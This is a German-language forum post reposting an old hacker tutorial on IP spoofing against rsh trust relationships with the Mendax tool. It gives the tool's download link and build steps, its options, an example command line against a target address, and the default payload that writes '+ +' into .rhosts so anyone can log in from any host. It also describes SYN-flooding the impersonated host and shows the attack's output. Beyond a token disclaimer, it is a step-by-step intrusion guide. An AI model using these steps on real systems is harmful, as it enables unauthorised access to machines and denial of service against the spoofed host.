Simple Spoofing Attacks

Newcomer - Board
Verfügbare Informationen zu "Simple Spoofing Attacks"

  • Qualität des Beitrags: 0 Sterne
  • Beteiligte Poster: 4dministr4t0r
  • Forum: Newcomer - Board
  • Forenbeschreibung: Forum für alle "Newcomer" (Alter, Geschlecht etc. egal), die sich im Bereich Systemsicherheit weiterbilden wollen. Chatten könnt Ihr am Ende der Seite!
  • aus dem Unterforum: Tutorials (Info-Texte)
  • Antworten: 1
  • Forum gestartet am: Samstag 23.12.2006
  • Sprache: deutsch
  • Link zum Originaltopic: Simple Spoofing Attacks
  • Letzte Antwort: vor 16 Jahren, 2 Monaten, 31 Tagen, 19 Stunden, 54 Minuten
  • Alle Beiträge und Antworten zu "Simple Spoofing Attacks"

    Re: Simple Spoofing Attacks

    4dministr4t0r - 26.12.2006, 20:30

    Simple Spoofing Attacks
    ##############################################################################################

    Alle hier geposteten Tutorials sind im www zu finden und nicht von mir. Sie werden unverändert hier dargestellt.

    Wir weisen ausdrücklich darauf hin, daß wir mit dieser Ansammlung nicht zu Straftaten aufrufen oder animieren wollen!!!
    Alle Tutorials dienen ausschließlich zu Informationszwecken.

    Solltest Du ein von Dir erstelltes Tutorial hier finden und mit der Veröffentlichung bei Hackressort nicht einverstanden sein, schick mir eine PM oder Email.

    Das Tutorial wird dann entfernt.

    Hackressort-Team

    ##############################################################################################


    SIMPLE SPOOFING ATTACKz

    *************************

    2000 by Ph4n7oM, Member of the H07-CREW



    Ich möchte hier anhand eines Beispiels erklären wie man eine Simple Spoofing Atacke ausführen kann. Ihr braucht dazu das Programm Mendax was es unter http://ftp.gwdg.de/pub/misc/www.rootshell.com/hacking/mendax_linux.tgz

    zum downloaden gibt. Mendax ist ein ein einfach zu bedienentes Tool zur Bestimmung von TCP-Sequenznummern und rshd-Spoofing. Nach dem Donwload entpackt Ihr mendax und gebt dann in dem Verzeichnis make ein. Daraufhin erscheint eine Einzelne mendax-file die ausführbar ist. Wenn ihr nun einfach nur "./mendax" eingebt erscheint eine liste mit den optionen:

    $ ./mendax

    -p PORT first port on localhost to occupy

    -s PORT server port on <source> to swamp

    -l USERNAME user on <source>

    -r USERNAME user on <target>

    -c COMMAND command to execute

    -w PORT wait for a TCP SYN packet on port PORT

    -d read data from stdin and send it

    -t test whether attack might succeed

    -L TERM spoof rlogind instead rshd

    -S PORT port from which to sampel seq numbers.



    So nun kanns losgehen:

    Angenommen wir haben 3 Rechner.

    - 62.16.23.1 - Irgend ein Linuxrechner der als Ziel funkiert

    - 62.16.23.2 - Der angreifende Rechner also unserer

    - 62.16.23.3 - Der Rechner desen Adresse Wir vortäuschen

    Der Rechner 62.16.23.1 (ziel) hat eine hosts.quiv-Datei die rsh-Traffic von 62.16.23.3 zuläßt.

    # /etc/host.quiv

    localhost

    62.16.23.3

    Unser Ziel soll es sein, einen rsh-Befehl auf 62.16.23.1 als benutzer von 62.16.23.3 auszuführen obwohl wir von 62.16.23.2 aus eingelogt sind. Mendax erleichtert uns diese Aufgabe durch eine Befehlsfunktion. Wenn Mendax herausfindet, dass der Zielhost verwundbar ist, wird es jeden gewünschten Befehl auf diesem ausführen. Per Voreinstellund sendet Mendax diesen Befehl:

    mv .rhost .r; echo + + > .rhosts

    Dieser Befehl erzeugt entweder eine neue .rhosts-Datei oder zerstört die alte auf dem Zielrechner. Was nun eintritt ist eigentlich egal, Ergebniss wird immer sein das sich eine .rhosts datei auf dem zielrechner befindet die jedem ermöglicht sich von jedem beliebiegen host aus einzuloggen. Auf unserem Rechner führen wir nun folgendes aus. Im Verzeichnis von Mendax geben wir "./mendax -p 514 62.16.23.3 62.16.23.1 -l testuster -r testuser

    Die weißt mendax an eine rsh-anforderung von 62.16.23.3 an rshd 62.16.23.1 als Benutzer testuser zu spoofen. Um diese Aufgabe auszuführen, setze Mendax zuerst 62.16.23.3 auser gefecht, damit er keine Pakete vom Ziel beantworten konnte:

    flooding source with TCP SYN packets from 62.16.23.3

    Als nächstes analisierte mendax die Sequensnummern-erzeugung von 62.16.23.1, und schließlich hat mendax rsh gespooft und versucht, diesen befehl auszuführen:

    using 64000 as prediction difference (3 hits).

    spoofing rsh.

    resetting TCP target connection: .

    resetting source: .............................

    [root@linuxstation]#

    Hat auch funktioniert? Darauf könnt Ihr einen kippen. Im Verzeichnis des Benutzers "testuser"auf 62.16.23.1 ist eine neue Datei aufgetaucht:

    $ ls -l .r*

    -rw-r--r-- 1 testuser user 3.Jan 01 12:13 .rhosts

    Inhalt der datei:

    + +

    Jetzt ist 62.16.23.1 für einen umfassenden Angriff geöffnet, aber jetzt wird interresant. Der Zieltrechner hat die Verbindung als eine rshd-Anfrage von 62.16.23.3 protokilliert.


    So das wars. Was man nun anstellen kann erklärt sich ja wohl von selber. So bis zum nächsten tut. Phantom@tryhackme.zzn.com



    Mit folgendem Code, können Sie den Beitrag ganz bequem auf ihrer Homepage verlinken



    Weitere Beiträge aus dem Forum Newcomer - Board

    Voipbuster umsonst telefonieren - gepostet von 4dministr4t0r am Dienstag 26.12.2006
    HIHO - gepostet von SoNNyT am Sonntag 27.05.2007



    Ähnliche Beiträge wie "Simple Spoofing Attacks"

    Simple Plan - brinaperli (Mittwoch 25.04.2007)
    yous mods are so damn lazy - deathwalker (Dienstag 13.10.2009)
    Simple Plan - LauRiii (Sonntag 14.05.2006)
    Simple Plan finde ich erst seit kurzem super - badboy0610 (Sonntag 28.05.2006)
    ABBA Collected - Haddock (Freitag 22.07.2011)
    Zerg attacks Rysarth - Rysarth (Freitag 01.06.2007)
    Simple gefühle - Dark_Orion (Mittwoch 06.12.2006)
    3 attacks in 1 1/2 tagen von irgendam spasst - Lener (Mittwoch 16.08.2006)
    22.08.2007 Volusia County Shark Attacks Climb To Double Digi - infoshark (Donnerstag 23.08.2007)
    SIMPLE PLAN - Chrissy (Sonntag 07.10.2007)